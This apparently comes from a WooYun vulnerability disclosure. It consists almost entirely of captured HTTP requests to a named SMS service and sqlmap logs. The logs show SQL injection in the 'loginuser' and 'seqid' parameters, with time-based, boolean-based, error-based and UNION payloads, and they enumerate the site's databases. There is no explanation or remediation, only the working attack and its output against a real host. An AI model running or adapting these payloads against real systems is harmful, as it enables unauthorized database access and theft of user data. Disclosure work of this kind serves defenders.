WooYun.org

GET /user_findloginuser.jsp?loginuser=admin HTTP/1.1
Host: sms.iddsms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept: */*
Referer: http://sms.iddsms.com/fgpaswd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A

GET parameter 'loginuser' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 93 HTTP(s) requ
ests:
---
Parameter: loginuser (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: loginuser=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))RKKk) AND 'qx
iH'='qxiH
---
[14:49:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[14:49:52] [INFO] fetching database names
[14:49:52] [INFO] fetching number of databases
[14:49:52] [INFO] retrieved:
[14:49:52] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[14:50:09] [INFO] retrieved:
[14:50:14] [INFO] adjusting time delay to 4 seconds due to good response times
[14:50:34] [ERROR] invalid character detected. retrying..
[14:50:34] [WARNING] increasing time delay to 5 seconds
[14:50:55] [ERROR] invalid character detected. retrying..
[14:50:55] [WARNING] increasing time delay to 6 seconds
information_schema
[14:59:32] [INFO] retrieved: w
[15:00:31] [ERROR] invalid character detected. retrying..
[15:00:31] [WARNING] increasing time delay to 7 seconds
ebsm
[15:03:08] [ERROR] invalid character detected. retrying..
[15:03:08] [WARNING] increasing time delay to 8 seconds
s
[15:04:35] [ERROR] invalid character detected. retrying..
[15:04:35] [WARNING] increasing time delay to 9 seconds
s
available databases [2]:
[*] information_schema
[*] websmss
[15:05:18] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\sms.iddsms.com'

GET /manager/base/tailmt.jsp?seqid=1262236 HTTP/1.1
Host: sms.iddsms.com
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A

sqlmap identified the following injection points with a total of 43 HTTP(s) requ
ests:
---
Parameter: seqid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: seqid=1262236' AND 9000=9000 AND 'zfLF'='zfLF
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: seqid=1262236' AND (SELECT 5252 FROM(SELECT COUNT(*),CONCAT(0x71627
17871,(SELECT (ELT(5252=5252,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATI
ON_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bYNj'='bYNj
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: seqid=1262236' AND (SELECT * FROM (SELECT(SLEEP(5)))WYNu) AND 'uALS
'='uALS
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: seqid=-2842' UNION ALL SELECT CONCAT(0x7162717871,0x4362637344627a5
2594b,0x71627a6271)--
---
[15:00:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[15:00:48] [INFO] fetching database names
[15:00:48] [INFO] the SQL query used returns 2 entries
[15:00:49] [INFO] retrieved: information_schema
[15:00:49] [INFO] retrieved: websmss
available databases [2]:
[*] information_schema
[*] websmss
[15:00:50] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\sms.iddsms.com'
[*] shutting down at 15:00:50